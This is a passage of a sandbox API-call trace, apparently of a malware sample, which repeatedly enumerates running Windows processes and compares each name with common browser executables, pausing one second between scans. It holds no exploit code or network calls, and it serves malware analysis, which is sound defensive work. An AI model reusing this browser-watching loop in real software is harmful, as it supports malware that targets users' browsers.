th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0251.802] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0251.802] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0251.802] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0251.802] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0251.802] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.802] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.803] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0251.803] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0251.803] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0251.803] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0251.803] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.803] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.803] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0251.803] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0251.804] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0251.804] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0251.804] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.804] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.804] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0251.804] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0251.804] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0251.804] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0251.804] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.804] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.805] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0251.805] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0251.805] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0251.805] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0251.805] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.805] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.805] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0251.805] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0251.805] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0251.805] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0251.805] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.805] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0251.806] CloseHandle (hObject=0xe8) returned 1 [0251.806] Sleep (dwMilliseconds=0x3e8) [0252.807] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0252.808] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.809] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0252.809] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0252.809] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0252.809] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0252.809] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0252.809] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0252.809] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0252.809] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0252.809] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0252.809] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0252.809] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0252.810] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0252.810] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0252.810] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0252.810] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0252.810] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0252.810] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.810] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.811] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0252.811] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0252.811] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0252.811] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0252.811] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.811] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0252.811] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0252.811] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0252.811] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0252.811] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0252.811] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.811] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.812] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0252.812] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0252.812] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0252.812] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0252.812] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.812] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0252.812] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0252.812] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0252.812] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0252.812] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0252.812] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.812] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0252.813] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0252.813] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0252.813] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0252.813] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0252.813] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.813] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0252.814] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0252.814] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0252.814] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0252.814] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0252.814] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.814] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0252.814] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0252.814] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0252.814] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0252.814] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0252.814] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.814] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.815] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.815] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.815] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.815] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0252.815] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.815] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.815] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.815] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.815] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.815] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0252.815] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.815] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.816] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.816] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.816] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.816] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0252.816] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.816] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.816] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.816] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.816] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.817] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0252.817] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.817] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.817] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.817] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.817] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.817] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0252.817] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.817] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.818] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0252.818] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0252.818] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0252.818] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0252.818] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.818] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.818] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.818] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.818] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.818] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0252.818] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.818] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.819] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.819] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.819] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.819] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0252.819] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.819] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0252.819] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0252.819] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0252.819] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0252.819] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0252.819] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.819] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0252.820] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0252.820] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0252.820] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0252.820] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0252.820] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.820] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0252.820] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0252.821] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0252.821] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0252.821] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0252.821] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.821] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.821] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.821] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.821] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.821] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0252.821] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.821] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0252.822] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0252.822] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0252.822] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0252.822] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0252.822] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.822] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0252.822] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0252.822] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0252.822] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0252.822] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0252.822] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.822] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0252.823] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0252.823] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0252.823] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0252.823] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0252.823] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.823] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0252.823] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0252.823] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0252.824] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0252.824] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0252.824] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.824] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0252.824] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0252.824] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0252.824] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0252.824] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0252.824] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.824] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0252.825] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0252.825] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0252.825] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0252.825] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0252.825] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.825] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0252.825] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0252.825] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0252.825] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0252.825] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0252.825] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.825] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0252.826] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0252.826] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0252.826] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0252.826] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0252.826] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.826] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0252.826] 